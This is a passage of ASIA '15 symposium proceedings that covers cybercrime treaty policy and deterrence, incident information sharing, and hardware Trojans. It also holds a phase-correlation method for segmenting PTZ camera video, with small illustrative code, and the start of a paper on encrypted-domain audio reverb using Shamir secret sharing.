The verification tools of the International Monitoring System of the Comprehensive Test Ban Treaty Organization (CTBTO) were easily able to detect the nuclear tests by North Korea in 2006 and 2009 [5] and led to the necessary international response. In cyberspace, however, a cyber attacker can hide himself readily, and even disguise his attack to appear to originate from a third party. The problem of attribution for a cyber-action is clearly one that will complicate any effort at security controls. Uncertainty about attribution will also constrain retaliatory action. The current level of research in reliable attribution is not adequate. The cyber crime treaties cannot be implemented unless trust exists between signatories that best efforts are being made to identify the criminals; transparency is therefore the first precondition for success.

C. Authority

The designation of a state agency that would lead the response to an international cyber-attack would depend on the nature of the attack. The vast majority of hostile cyber-activity originates with criminal elements, for which law enforcement agencies are normally responsible. A response to use of the Internet by terrorists might entail pooling resources from both the national security and law enforcement communities. The fact that hostile international cyber-activity is not exclusively or even predominantly a national security phenomenon adds a further complication to the development of internationally acceptable approaches for regulating or policing such activity. The principal international collaborative initiative for countering cybercrime, the 2001 Budapest Convention on Cybercrime by the Council of Europe, has run into roadblocks in the absence of mutual trust and through attempts to erect barriers to operational procedures (remote login to suspected computer systems) considered crucial for the timely collection of evidence, which is in any case very fragile.

D. Activity

Hostile international cyber-activity, as already noted, can be perpetrated by state or non-state actors. Within state actors too, the military and intelligence arms of nation states operate under different norms. Intelligence agencies of all countries with means and capacity will keep tabs on adversaries and on activities they perceive as threats. No international agreement or legislation will change that. When such attempts to spy are exposed, as by Snowden, there will be a degree of furor and then it will be business-as-usual [5].

V. THE POSSIBLE OPTIONS

A. Necessity for a Review of Cyberspace Use

Considering the above four special features of the cyber domain that seem to discourage international treaties to combat cyber crime and terrorism, we conclude that bilateral and multilateral trust and transparency amongst signatories is a precondition for success. All nations have to realize that dual use of cyberspace for commercial and military purposes is fraught with unacceptable risks. If we look, as precedents, at the international treaties [4] for nuclear weapons, the Chemical Weapons Convention, the Biological and Toxin Weapons Convention, the Outer Space Treaty of 1967 prohibiting the placement of weapons of mass destruction in outer space and the militarization of the Moon and other celestial bodies, and, more recently, the Ottawa and Oslo treaties banning anti-personnel landmines and cluster munitions respectively, there is hope for international cooperation in cyberspace. The efficiency gains provided by the cyber domain are very valuable for mankind, and using them for mutual destruction would be a serious folly.

Once all nation states share this common perception, combating cyber crime and terror would not be an impossible mission. The Budapest Convention (the Council of Europe (COE) Convention on Cybercrime, 2001) was a good attempt to seek international cooperation to harmonize the law enforcement efforts of all nations against cyber crime. However, lack of trust and international political compulsions to use the cyber domain for projecting state power have sabotaged this potential collective action against cyber crime. With the development of new technologies such as cloud computing, "smart" phones and social media, as well as the emergence of botnets and the expansion of encryption, the Budapest Convention requires updating [6] before it can be ratified by all nations.

We need to realize that state actors, particularly militaries and intelligence agencies, will certainly use ICT networking technologies to achieve efficiency gains in their core activities. It is important that their ICT networking infrastructure is protected both from non-state actors, viz. criminals and terrorists, and from competing state actors, viz. foreign militaries and intelligence agencies. Use of commercial internet technologies for this segment is fraught with risk, and there is therefore a case for evolving hardened systems for such niche groups.

B. Role of deterrence in combating cyber crime and terrorism

Deterrence theory can be applied to all cyber crimes, including cyber terrorism [7], [8]. The impact of deterrence (the deterrence effect) is positively correlated with the identification probability, and it may also be positively correlated with the punishment level. Keeping the potential punishment severity unchanged, the deterrence effect is determined by the identification probability, which in turn depends upon the capability to track cyber terrorists [9]. Thus, to increase the impact of deterrence on cyber terrorism, the identification probability must be increased. An inability to track cyber terrorists makes it difficult for local and international jurisdictions to uncover the entire network of cyber terrorists, as well as to prosecute them, due to the lack of proof of identity of these cyber terrorists. The adoption of a new variant of a cyber crime and terrorism convention by all nations would provide an eco-system that puts criminals and terrorists under pressure and increases the success probabilities of international law enforcement agencies.
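This relationship can be sketched as a simple expected-penalty model; the function below and its parameter values are purely illustrative assumptions, not a model taken from [7]-[9].

```python
# Illustrative expected-penalty model of deterrence (hypothetical):
# the deterrent effect is modeled as the product of the probability
# of identifying the offender and the severity of the punishment.
def deterrence_effect(p_identify, punishment):
    """Expected penalty faced by a potential offender."""
    return p_identify * punishment

# Holding punishment severity fixed, the effect is driven entirely
# by the identification probability.
fixed_punishment = 10.0
low = deterrence_effect(0.05, fixed_punishment)
high = deterrence_effect(0.50, fixed_punishment)
assert high > low
```

Under this toy model, raising the identification probability tenfold raises the expected penalty tenfold, which is the sense in which the deterrence effect is "determined by" the identification probability when punishment is held fixed.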

VI. CONCLUDING REMARKS

This paper has attempted to unveil the underlying reasons for rising cybercrime. The race for dominance has prevented nation states from seeing the logic of unrestricted international collaboration to combat cyber crime and terrorism. The peaceful use of the cyber domain for the good of mankind offers unimagined opportunities. The common enemies of all nation states are cyber criminals and terrorists. Collaboration with adequate trust, and unrestricted access for law enforcement agencies across national boundaries, would certainly mitigate this transnational menace.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 30

REFERENCES

[1] J. J. Zhao and S. Y. Zhao, "Opportunities and threats: A security assessment of state e-government websites," Government Information Quarterly, 27, 49-56, 2010.

[2] United Nations, International review of criminal policy: United Nations manual on the prevention and control of computer-related crime, 1994.

[3] N. Choucri, S. Madnick and J. Ferwerda, "Institutions for Cyber Security: International Responses and Global Imperatives," Information Technology for Development, 2013. DOI: 10.1080/02681102.2013.836699.

[4] P. Meyer, "Cyber-Security through Arms Control," The RUSI Journal, 156:2, 22-27, 2011. DOI: 10.1080/03071847.2011.576471.

[5] S. Saran, "Internet realpolitik," ORF Cyber Monitor, Volume II, Issue 3, March 2014.

[6] R. Broadhurst and L. Y. C. Chang, "Cybercrime in Asia: Trends and Challenges," in J. Liu et al. (eds.), Handbook of Asian Criminology, Springer Science+Business Media New York, 2013. DOI: 10.1007/978-1-4614-5218-8_4.

[7] J. Ginges, "Deterring the terrorist: A psychological evaluation of different strategies for deterring terrorism," Terrorism and Political Violence, 9(1), 170-185, 1997.

[8] M. P. C. Carns, "Reopening the deterrence debate: Thinking about a peaceful and prosperous tomorrow," Small Wars & Insurgencies, 11(2), 7-16, 2001.

[9] J. Hua and S. Bapna, "How Can We Deter Cyber Terrorism?" Information Security Journal: A Global Perspective, 21:2, 102-114, 2012. DOI: 10.1080/19393555.2011.647250.


Information Sharing to Manage Cyber Incidents: Deluged with Data Yet Starving for Timely Critical Data

Sanjay Goel
School of Business, University at Albany, SUNY
Albany, New York

Charles Barry
National Defense University
Washington, DC

Cyber security incidents that degrade user security and access to the Internet are often international in nature, simply because of the distributed, borderless nature of Internet traffic flows. Effective incident response management involves detection of the breach, blocking the perpetrators from damage or theft, and identifying those responsible for prosecution. Defense against cyber threats requires the ability not only to detect breaches, but also to contain them quickly and remedy the vulnerabilities that were exploited. The robust exchange of threat and vulnerability information across organizations can improve collective national security. Development of situational awareness capability during incidents requires the collection of data from log files, both on the victim organization's and the attackers' servers, through Internet Service Providers that may not even be in the same country. Sharing of relevant data among responders is important both for broad participation and timeliness. No less important is close cooperation among public and private-sector actors: those essential to successful response, but also those who may become the future victims of cyber incidents, both systemic and malicious. Success means ameliorating the effects of causal factors as rapidly as possible, and restoring critical systems to full operation. Information sharing is a monumental task, encumbered by administrative morass and, often, by our inability to pinpoint the precise data needed.

This paper explores the current methods of international information sharing across both private and public-sector organizations. It examines what information is critical to be shared initially, and then on a continuing basis during incident response. The paper provides a critical assessment of the hurdles still to be overcome before broad and timely sharing of information can become a reality. Finally, it offers options for improving the identification of what characterizes essential data within the overwhelming data volume of the Internet, and methods for sharing such data among responders. The salient conclusions are that: cooperation in cyber incident response, while well recognized, is in its infancy in terms of identification of critical data to be shared; effective information sharing is the rare exception rather than a well-established practice; and the primary hurdles remaining are human factors, not technological inadequacy. The long-term strategy for information sharing requires streamlining the administrative process, standardizing formats for data exchange, and creating specific data collection requirements for organizations as well as Internet operators. The paper concludes with recommendations for the future of information sharing among organizations.

The full version will be made available online through the ASIA website at: http://www.albany.edu/iasymposium


Whose Job is it to Solve the Cybersecurity Problem?

Bruce McConnell
Senior Vice President, EastWest Institute

Most organizations believe that in cyberspace, offense wins, and that cyber defenders are doomed to remain forever in reactive mode. While everyone says "cybersecurity is a shared responsibility," the roles of individuals, the larger community, and governments are not agreed upon. How do we get out of this hole?

BIOGRAPHY

Bruce McConnell leads EWI's relationship-building with government and businesses around the world. He also manages the institute's Cooperation in Cyberspace Initiative.

Beginning in 2009, McConnell was a leader of the cybersecurity mission at the U.S. Department of Homeland Security. He became Deputy Under Secretary for Cybersecurity in 2013, responsible for ensuring the cybersecurity of all federal civilian agencies and for helping the owners and operators of the most critical U.S. infrastructure protect themselves from growing cyber threats. During his tenure, McConnell was instrumental in building the national and international credibility of DHS as a trustworthy partner that relies on transparency and collaboration to protect privacy and enhance security.

Before DHS, McConnell served on the Obama-Biden Presidential Transition Team, working on open government and technology issues. From 2000 to 2008 he created, built, and sold McConnell International and Government Futures, consultancies that provided strategic and tactical advice to clients in technology, business and government markets. From 2005 to 2008, he served on the Commission on Cybersecurity for the 44th Presidency.

From 1999 to 2000, McConnell was Director of the International Y2K Cooperation Center, sponsored by the United Nations and the World Bank, where he coordinated regional and global preparations of governments and critical private-sector organizations to successfully defeat the Y2K bug. McConnell was Chief of Information Policy and Technology in the U.S. Office of Management and Budget from 1993 to 1999.

McConnell is also a senior advisor at the Center for Strategic and International Studies. He received a Master of Public Administration from the Evans School for Public Policy at the University of Washington, where he maintains a faculty affiliation, and a Bachelor of Science from Stanford University.



Shot Segmentation and Grouping for PTZ Camera Videos

Andrew Pulver¹, Ming-Ching Chang², and Siwei Lyu¹
¹Computer Science Department, University at Albany, State University of New York
²GE Global Research, Niskayuna, NY
Email: {apulver, slyu}@albany.edu, [email protected]

Abstract—We present a method for detecting shot boundaries and grouping together shots that were taken from identical camera directions. The technique utilizes methods including spectral clustering and phase correlation to achieve fast and accurate segmentation and grouping.

Keywords—Shot Segmentation, Shot Boundary Detection, Shot Grouping, Cut Detection

I. INTRODUCTION

The exact definition of a shot varies, but it is roughly defined as an uninterrupted sequence of frames that have been taken from one camera [10], [9]. We examine videos taken from PTZ (pan, tilt, zoom) security cameras. A PTZ camera may be programmed to automatically transition between a set of directions. The resulting video would consist of many shots, each of which corresponds to a period of time where the camera was not moving. We define a scene as a group of shots taken from the same camera direction and thus having the same background. Organizing these videos into scenes can be useful as a preprocessing step for video summarization techniques such as video synopsis [6], which requires a fixed background.

II. RELATED WORKS

Many methods exist for shot boundary detection. A recent survey lists a large collection of these techniques [8]. Two methods noted in the survey to perform well are phase correlation [9] and background tracking [5]. We combine a phase-correlation based approach with background tracking.

Our method uses spectral clustering to group shots together, as do some previous works on scene detection and shot grouping [4], [2]. Spectral clustering requires some way of measuring the similarity between two items. Past research on scene detection involves methods that rely, at least partially, on color similarities between scenes [2], [7]. In [2], a scene is defined as "...a series of semantically correlated shots". Similarly, in [7], a scene is defined as "...a subdivision of a play in which either the setting is fixed or when it presents continuous action in one place". These definitions are more general than ours, and their similarity measures are not directly applicable to this problem.

Color histograms are not a reliable measure of shot similarity in our case, since the videos we examine tend to have different scenes with a high degree of color similarity. Another point to consider is that the color content may vary greatly between different shots of the same scene, for instance in a video with moving traffic. Since our definition of a scene is more specific, we must define a different similarity measure. Temporal similarity is also taken into account in [4]. However, in our case, temporal distance is also not a good indicator of shot similarity. Our task boils down to background matching, but it is complicated by unstable lighting conditions and foreground appearance.

III. METHOD

Phase correlation is an established method for detecting hard cuts [10], [9]. However, applying phase correlation over the frames of a high resolution video can be computationally expensive. Instead, we use phase correlation on a small portion of the image. We also propose using phase correlation as a measure of similarity for grouping shots into scenes.

IV. SHOT BOUNDARY DETECTION

We define a shot as an uninterrupted segment of video taken from the same camera direction. It is assumed that foreground objects may change rapidly, and that changes in the foreground do not necessarily indicate a cut. The background tracking technique in [5] makes use of only a portion of the image, which they call the "fixed background area", or FBA. This consists of a bar along the top of the image and two bars along the left and right sides of the image. These three portions are combined into one image called the "transformed background area", or TBA. This is done by rotating the left portion clockwise and rotating the right portion counter-clockwise by ninety degrees. The process is nicely illustrated in the original paper. They also provide formulas to calculate the exact dimensions of the FBA.
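A minimal sketch of this construction is given below; it approximates the bar dimensions with a fixed 1/8-of-width bar rather than the exact formulas of [5], and assumes grayscale frames.

```python
import numpy as np

def transformed_background_area(frame, frac=8):
    """Build an approximate TBA: a top bar plus left/right side bars
    (taken below the top bar), with the left bar rotated clockwise and
    the right bar counter-clockwise, joined into one bar-tall image.
    The bar width of w // frac is an assumption, not the exact
    dimensions derived in [5]."""
    h, w = frame.shape
    bar = w // frac
    top = frame[:bar, :]                       # bar x w strip
    left = np.rot90(frame[bar:, :bar], k=-1)   # clockwise: bar x (h - bar)
    right = np.rot90(frame[bar:, -bar:], k=1)  # counter-clockwise
    return np.concatenate([left, top, right], axis=1)

# For a 64 x 64 frame the bar is 8 pixels, so the TBA is 8 x 176.
tba = transformed_background_area(np.zeros((64, 64)))
assert tba.shape == (8, 176)
```

The point of the construction is that all three border strips end up in a single small image, so one FFT-based comparison covers the whole fixed background.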

Their shot detection algorithm is a multi-stage process. In our experiments, we noted that the second stage of their algorithm (which is designed to filter out false positives) tended to filter out actual cuts, likely due to the color similarity of our shots. Better results can be obtained by skipping their detection method altogether and using phase correlation on the transformed background area. This method is simple and fast, given that FFTs are only computed over a fraction of the image. A simple method for phase correlation applied to cut detection is given in [10]. The correlation surface can be computed as [10]:

S(f_i, f_{i+1}) = \mathcal{F}^{-1}\left(\frac{\mathcal{F}(f_i^{*}) \cdot \mathcal{F}(f_{i+1})}{\left|\mathcal{F}(f_i^{*}) \cdot \mathcal{F}(f_{i+1})\right|}\right) \quad (1)


where f_i is the i-th frame after applying a window function, * is the complex conjugate, and \mathcal{F} is a 2-dimensional Fourier transform. If f_i and f_{i+1} are approximately the same image, there will be a high peak in the correlation surface.
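A minimal NumPy sketch of Eq. (1) follows; the window function is omitted for brevity, and the small epsilon in the denominator is our addition to avoid division by zero.

```python
import numpy as np

def correlation_surface(f1, f2, eps=1e-12):
    """Phase correlation surface S(f1, f2) of Eq. (1): the inverse FFT
    of the normalized cross-power spectrum (windowing omitted)."""
    cross = np.conj(np.fft.fft2(f1)) * np.fft.fft2(f2)
    return np.real(np.fft.ifft2(cross / (np.abs(cross) + eps)))

rng = np.random.default_rng(0)
frame = rng.random((64, 64))

# Identical frames give a sharp peak at (0, 0); a circular shift of
# the frame moves the peak to the shift offset.
S = correlation_surface(frame, frame)
assert np.unravel_index(np.argmax(S), S.shape) == (0, 0)
shifted = np.roll(frame, (5, 3), axis=(0, 1))
S2 = correlation_surface(frame, shifted)
assert np.unravel_index(np.argmax(S2), S2.shape) == (5, 3)
```

Because only the phase of the cross-power spectrum is kept, the peak height measures how well the two images align rather than how similar their intensities are, which is what makes the measure robust to foreground changes.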

They partition the images into many overlapping blocks b^{(k)} and take:

P(f_i, f_{i+1}) = -\sum_{k=1}^{B} \ln\left(\max_{y,x} S\left(b^{(k)}_{f_i}, b^{(k)}_{f_{i+1}}\right)\right) \quad (2)

For our experiments, each image was divided into four parts, overlapping by 1/4 of the total height/width of the image in the vertical/horizontal direction, respectively. We also took 1/B of the sum in (2), so our thresholds do not depend on the number of blocks.

Relying only on the FBA can result in false positives. A large moving object may occlude most of the FBA but not the rest of the image. To prevent this kind of false positive, the entire image can be checked with phase correlation to confirm the shot boundary. To summarize, the steps we use to detect a shot boundary between frames f_i and f_{i+1} are:

1) Compute the TBAs t_i, t_{i+1} for frames f_i, f_{i+1}.
2) If P(t_i, t_{i+1}) > T, then there is a potential cut at i.
3) If P(f_i, f_{i+1}) > T, then there is a cut at i.

where T is a threshold.

V. GROUPING

Individual shots should be grouped according to the camera direction from which they were taken. Each output video would then consist of multiple shots with the same background.

Spectral clustering can be used to group different shots together [4], [2]. However, instead of using colors to compare shots, we use phase correlation. The whole frames of each shot (as opposed to just the TBAs) are used, after being down-sampled as suggested in [9]. The mean of each shot is computed and used as a representative for that shot.

We need a measure of similarity, rather than a measure of dissimilarity, so we take:

P_s(m_i, m_j) = -\frac{1}{B}\sum_{k=1}^{B} \ln\left(1 - \max_{y,x} S\left(b^{(k)}_{m_i}, b^{(k)}_{m_j}\right)\right) \quad (3)

where m_i and m_j are the means of the i-th and j-th shots.

We can also adjust this value according to the coordinates of the peak in the correlation surface. Since the camera should be still during each shot, if the peak is far from (0, 0), then we do not consider these images similar. The similarity measure can be multiplied by:

D(m_i, m_j) = \exp\left(-\frac{\left\|\arg\max_{y,x} S(m_i, m_j)\right\|}{C}\right) \quad (4)

where C is some constant.

Or, since we use several blocks:

D_b(m_i, m_j) = \frac{1}{B}\sum_{k=1}^{B} D\left(b^{(k)}_{m_i}, b^{(k)}_{m_j}\right) \quad (5)

Using the spectral clustering algorithm found in [3] along with our similarity measure, we follow these steps to compute the clusters of shots. The number of clusters can be estimated using the method from [11]. Let {m_1, m_2, ..., m_n} be the means of the shots.

The algorithm:

1) Let A_{i,j} = P_s(m_i, m_j) \cdot D_b(m_i, m_j).
2) Let L = D^{-1/2} A D^{-1/2}, where D_{i,i} = \sum_j A_{i,j}.
3) Find the eigenvalues and eigenvectors of L.
4) Create another matrix X using the corresponding eigenvectors as columns. Normalize the rows of X to get Y. Use k-means++ to cluster the rows of Y.¹
5) The cluster for element m_j ∈ {m_1, m_2, ..., m_n} corresponds to the cluster for row Y_j ∈ Y.

VI. EXPERIMENTS

We tested this method on a group of videos taken by PTZ cameras. These cameras switched between a set of directions on a schedule. For instance, a camera may rotate clockwise by ninety degrees every few seconds, producing a video with four scenes. The transitions between camera directions are nearly instantaneous, i.e., the camera rapidly changes direction rather than slowly panning to the next position. Nearly all hard cuts were detected and nearly all shots were grouped into the correct scene.

We always down-sampled images (both TBAs and whole frames) to one quarter of their original size before applying phase correlation. We use the formulas in [5] to calculate the FBA dimensions; however, we start with 1/8 of the image width instead of 1/10, resulting in a slightly larger TBA. On our 640 × 480 resolution videos, the cut detection works in real time (using FFTW to compute the FFTs). Of course, calculating the affinity matrix becomes slow for videos with many shots. Processing long videos in shorter segments and matching the resulting scenes may be a possibility.

Fig. 1 illustrates the results of performing phase correlation on TBAs and on the whole frames. The spikes in the graph indicate shot transitions. Using the TBA instead of the whole frame typically produces results that are at least as accurate. It is also interesting to look at the similarity between the mean of a shot and the means of the other shots in a video. Fig. 2 shows the results of such a comparison (we used a larger portion of the video for this figure). Phase correlation and histogram correlation were used for Fig. 2a and 2b, respectively.

We hand-labeled the cuts on six PTZ camera videos and ran the detection algorithm. The results can be seen in Table I. The videos were taken by cameras on a schedule and switched from one direction to the next every few seconds. The transitions between camera directions were brief, but in some cases lasted

¹The k-means++ algorithm (see [1]) produced better results than ordinary k-means. In [2], they also use a modified version of k-means.


Fig. 1. P(f_i, f_{i+1}) for one of our test videos: (a) TBAs, (b) Whole Frames.

Fig. 2. P(f_i, f_{i+1}) for one of our test videos: (a) Phase Correlation, (b) Histogram Correlation.

TABLE I. CUT DETECTION RESULTS

Video                 |      1 |      2 |      3 |      4 |      5 |      6
----------------------|--------|--------|--------|--------|--------|--------
Frames                |   1801 |    144 |   2399 |   1357 |    899 |   1370
Actual Cuts           |     99 |     21 |     62 |     86 |    124 |    129
Reported Cuts         |    103 |     21 |     68 |     90 |    122 |    128
False Positives       |      5 |      1 |      7 |      9 |      6 |     12
False Negatives       |      1 |      1 |      1 |      5 |      8 |     14
Precision             |  95.1% |  95.2% |  89.7% |  90.0% |  95.1% |  90.6%
Recall                |  99.0% |  95.2% |  98.4% |  94.2% |  93.5% |  89.1%
Major False Positives |      0 |      0 |      4 |      5 |      0 |      6
Major False Negatives |      0 |      0 |      0 |      0 |      0 |      2
Adjusted Precision    | 100.0% | 100.0% |  93.8% |  94.2% | 100.0% |  95.0%
Adjusted Recall       | 100.0% | 100.0% | 100.0% | 100.0% | 100.0% |  98.3%

several frames. Each frame in which the camera is moving or zooming was labeled as a cut. In some cases it was difficult to decide whether a frame should be a cut or not. We define a "Major False Positive" as a false positive that does not occur within one frame of an actual cut, and a "Major False Negative" as a false negative that does not occur within one frame of a reported cut. In other words, these are the false positives and negatives not counting off-by-one errors.

VII. CONCLUSION

We have presented a method for dividing videos into shots and grouping shots with identical backgrounds into scenes. This method addresses a case not previously considered and performs well. Future work may focus on achieving real-time performance and possibly adapting the method to work on a more general set of videos.


REFERENCES

[1] David Arthur and Sergei Vassilvitskii. "k-means++: The advantages of careful seeding." In Proceedings of the Eighteenth Annual ACM-SIAM Symposium on Discrete Algorithms, pages 1027-1035. Society for Industrial and Applied Mathematics, 2007.

[2] Vasileios T. Chasanis, Aristidis C. Likas, and Nikolaos P. Galatsanos. "Scene detection in videos using shot clustering and sequence alignment." IEEE Transactions on Multimedia, 11(1):89-100, 2009.

[3] Andrew Y. Ng, Michael I. Jordan, Yair Weiss, et al. "On spectral clustering: Analysis and an algorithm." Advances in Neural Information Processing Systems, 2:849-856, 2002.

[4] Jean-Marc Odobez, Daniel Gatica-Perez, and Mael Guillemot. "Spectral structuring of home videos." In Image and Video Retrieval, pages 310-320. Springer, 2003.

[5] JungHwan Oh, Kien A. Hua, and Ning Liang. "Content-based scene change detection and classification technique using background tracking." In Electronic Imaging, pages 254-265. International Society for Optics and Photonics, 1999.

[6] Yael Pritch, Alex Rav-Acha, and Shmuel Peleg. "Nonchronological video synopsis and indexing." IEEE Transactions on Pattern Analysis and Machine Intelligence, 30(11):1971-1984, 2008.

[7] Zeeshan Rasheed and Mubarak Shah. "Detection and representation of scenes in videos." IEEE Transactions on Multimedia, 7(6):1097-1105, 2005.

[8] Raahat Devender Singh and Naveen Aggarwal. "Novel research in the field of shot boundary detection - a survey." In Advances in Intelligent Informatics, pages 457-469. Springer, 2015.

[9] Oguzhan Urhan, M. Kemal Gullu, and Sarp Erturk. "Modified phase-correlation based robust hard-cut detection with application to archive film." IEEE Transactions on Circuits and Systems for Video Technology, 16(6):753-770, 2006.

[10] Theodore Vlachos. "Cut detection in video sequences using phase correlation." IEEE Signal Processing Letters, 7(7):173-175, 2000.

[11] Lihi Zelnik-Manor and Pietro Perona. "Self-tuning spectral clustering." In Advances in Neural Information Processing Systems, pages 1601-1608, 2004.


Securing against Malicious Hardware Trojans

Sanjay Goel
School of Business, University at Albany, SUNY
Albany, New York

John Hartley
Nanoengineering Constellation, Colleges of Nanoscale Science and Engineering
Albany, New York

Yuan Hong
School of Business, University at Albany, SUNY
Albany, New York

Hardware Trojans are malicious components of integrated circuits that are inserted into chips during the design and fabrication process. These Trojans can make a chip fail at critical moments, generate false signals, or create a backdoor that helps in stealing information. Hardware Trojans have existed for at least a decade, and an oft-cited example is the failure of Syrian radars to detect an incoming airstrike, attributed to a backdoor inserted into the radar chip. The architecture of chips is very complex, resulting in an intricate supply chain where multiple parties are involved in the design and fabrication of chips; consequently, there are multiple vulnerable points where hardware Trojans can be inserted. There is ongoing research on identifying Trojans in hardware through testing of the properties of the chips, or at the design level by examining the integrity of the design at different stages. In this paper, we lay out the design and manufacturing processes of chips and discuss the vulnerabilities in the process that can lead to compromise of the chips. We also discuss current research in the detection of hardware Trojans and in securing the design. Finally, we lay out a research agenda for the future.

The full version will be made available online through the ASIA website at: http://www.albany.edu/iasymposium



Secure Audio Reverberation over Cloud

M. Abukari Yakubu
Department of Applied Computer Science
University of Winnipeg, Winnipeg, MB, Canada
Email: [email protected]

Pradeep K. Atrey
Department of Computer Science
University at Albany, SUNY, Albany, NY, USA
Email: [email protected]

Namunu C. Maddage
NextGmultimedia, Melbourne, Australia
Email: [email protected]

Abstract—Most individuals, governments and companies who outsource audio content to Cloud Data Centers (CDCs) for storage also make use of their high-end computing services. However, security and privacy issues related to CDCs make it difficult for data to be processed without compromising security. In this work, we propose a secure method for artificially adding reverberation effects to an audio secret over cloud, with (K, N) Shamir's Secret Sharing (SSS) as the cryptosystem, for audio recording, reproduction, editing and enhancement. Our method implements convolution reverb in the encrypted domain by convolving a modeled impulse response of an acoustic space with shares of the audio secret. Experimental results show that our proposed method in the Encrypted Domain (ED) produces similar results as compared to performing the same operations in the Plaintext Domain (PD).

Keywords—Encrypted domain processing, cloud security, audio reverberation effect, convolution reverb, Shamir's secret sharing scheme (SSS).

I. INTRODUCTION

With the advent of cloud computing, which provides a framework of services for data storage, high-end computing and online access to computer resources, companies are saving cost and slashing investment on resources by outsourcing storage and processes to Cloud Service Providers (CSPs). Audio content is one type of data outsourced to CDCs for storage and computing services by individuals, governments and companies, such as the audio recording and reproduction industries (record labels) and forensic analysis providers. Most of these recordings are confidential and might contain sensitive information like names, credit cards, evidence to be used in a court of law by a jury, information with national security implications, etc.

Because of the security and privacy issues of using third-party servers like CDCs, companies first encrypt confidential audio content before uploading it to CDCs. In such cases, encryption schemes like the Advanced Encryption Standard (AES) are used, which suffer from single-point vulnerability, meaning that the security of the method lies in securing the encryption key, which is usually entrusted to the sender and receiver. Thus an adversary with access to the encryption key can obtain the confidential data. Most companies use not only CSP storage services, but also high-end computing services. When the need arises for some processing to be performed on these audio secrets, the third-party server will first have to decrypt the secret, which will expose the confidential information. This makes the confidential data vulnerable to exploitation by an adversary. In the case of sound recording companies (e.g., record labels), millions of dollars might be lost if a record in production is exposed. Hence, secure processing of such confidential audio is of utmost importance.

In order to perform processing in ED over cloud, encrypted signals have to be processed without decryption. This way, the security of the audio secret is not compromised. To this end, the fields of signal processing and cryptography have been merged to develop a new interdisciplinary framework called Signal Processing in the Encrypted Domain (SPED) [1]. Work done so far in this area has applied cryptographic primitives such as Secure Multiparty Computation (SMC), commitment schemes, Zero-Knowledge Protocols (ZKP), Private Information Retrieval and homomorphic encryption to develop schemes based on the security requirements of the application scenario, making secure signal processing possible. SPED has been applied in areas such as secure processing of medical data (MRI, ECG, DNA) [2], secure digital watermarking [3], data mining on private databases [4], [5], and protecting privacy in video surveillance systems [6].

Although some work has been done in SPED for images, videos, etc., it has scarcely been explored for audio. Table I details the comparison of work on audio processing in the encrypted domain. The authors in [7], [8] propose a technique to identify and verify speakers over encrypted voice over IP (VoIP) conversations. Here, the Variable Bit Rate (VBR) encoding and Voice Activity Detector (VAD) used to encode speech over a VoIP channel achieve lower bit rates but produce a packet length which is dependent on the speaker. Whereas the authors in [7] employ VBR encoding, the authors in [8] use the Voice Activity Detector approach. Both works use this speaker-dependent packet-length information extracted from encrypted VoIP signals to build models for identification and verification. The authors of [9] and [10] also present a framework for speaker verification/identification and sound recognition/classification, respectively, using Gaussian Mixture Models (GMM) in the encrypted domain. Both methods are based on SMC and homomorphic encryption (like the Paillier cryptosystem and the BGN cryptosystem), which enables computation and classification to be performed in a secure manner. The framework in [9] enables computation on encrypted speech data without revealing the actual voice patterns in plaintext. The framework in [10] involves two parties (party A and party B), party A providing the data and party B providing the recognition algorithm (classifier). Party B then applies his classification algorithm to party A's data in such a way that the data and results are not revealed to party B, thereby maintaining the privacy of the data. The security of these systems lies in protecting the encryption and decryption keys, as an adversary with access to the keys can obtain the plaintext data. Moreover,

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 39

TABLE I: Comparison of Work on Audio Processing in Encrypted Domain

Scheme | Task in Encrypted Domain | Cryptographic Primitive | Techniques Used
[7] | Speaker identification and verification over encrypted voice over IP (VoIP) conversations | AES | Variable Bit Rate (VBR) and hidden Markov models (HMMs)
[8] | Speaker identification and verification over encrypted voice over IP (VoIP) conversations | AES | Voice Activity Detector (VAD)
[9] | Speaker verification / identification | SMC and homomorphic encryption | Gaussian Mixture Models (GMM)
[10] | Sound recognition / classification | SMC and homomorphic encryption | Gaussian Mixture Models (GMM)
Proposed Scheme | Addition of reverb effect | Homomorphic encryption (SSS) | Convolution with modeled reverb impulse response

these methods are computationally expensive as a result of the large message space (1024 bits) and the exponentiation operations of the Paillier cryptosystem.

In this work, we focus on the addition of reverb effects to an audio recording in ED over the cloud. Reverb is one of the most widely used delay effects, alongside flanging, phasing, and chorus, for audio recording, reproduction, editing and enhancement. It adds an acoustic environment to an audio recording to make it sound realistic: the resulting reverb-effected audio inherits characteristics of that acoustic environment and sounds as if the recording had been made there. Reverberation is a series of delayed and attenuated sound waves reflected within an acoustic environment and perceived by the human ear less than 0.1 seconds after the original sound wave. The human auditory system cannot perceive a delay this short and interprets the original sound wave and the delayed reflections as one prolonged sound. This effect differs from echo, where delays exceed 0.1 seconds and the delayed sounds are perceived distinctly as decaying copies of the original. Key areas of application of reverb effects in audio are:

1) The recording industry, for audio production, editing and enhancement.

2) Audio forensics, for analyzing/simulating an audio recording in different acoustic environments.

3) Simulation of acoustic reverberation for dereverberation algorithms, etc.

In order to protect an audio secret so as to 1) eliminate the single point of vulnerability of the widely used AES, 2) avoid the large message space and high computational complexity of homomorphic schemes like the Paillier cryptosystem, and 3) make processing on the encrypted audio secret possible, we employ Shamir's Secret Sharing (SSS) to encrypt the secret into a number of shares that can be distributed among a number of CDCs, such that an authorized user must retrieve more than a certain number of shares to reconstruct the secret; individual shares are of no use on their own. The homomorphic property (addition and multiplication) of SSS makes ED processing possible. Furthermore, SSS is information-theoretically secure and is a (K,N) threshold scheme.

In this work, we propose an implementation of convolution reverb to artificially add reverb effects to an encrypted audio secret over the cloud, ensuring information assurance of the client's data from a privacy and security perspective. To the best of our knowledge, this is the first work that applies a reverb effect to an audio signal in the encrypted domain.

The rest of this paper is organized as follows. In Section II, we discuss Shamir's secret sharing scheme. We discuss artificial reverberation techniques in Section III. The proposed method for encrypted domain convolution reverb is detailed in Section IV, and Section V discusses the experimental results. We conclude the paper in Section VI.

II. SSS SCHEME

Shamir introduced his scheme in 1979 [11]. It is based on polynomial interpolation. The goal of the scheme is to divide data into N shares such that:

1) Any K or more shares can reconstruct the secret.
2) K − 1 or fewer shares cannot reconstruct the secret.

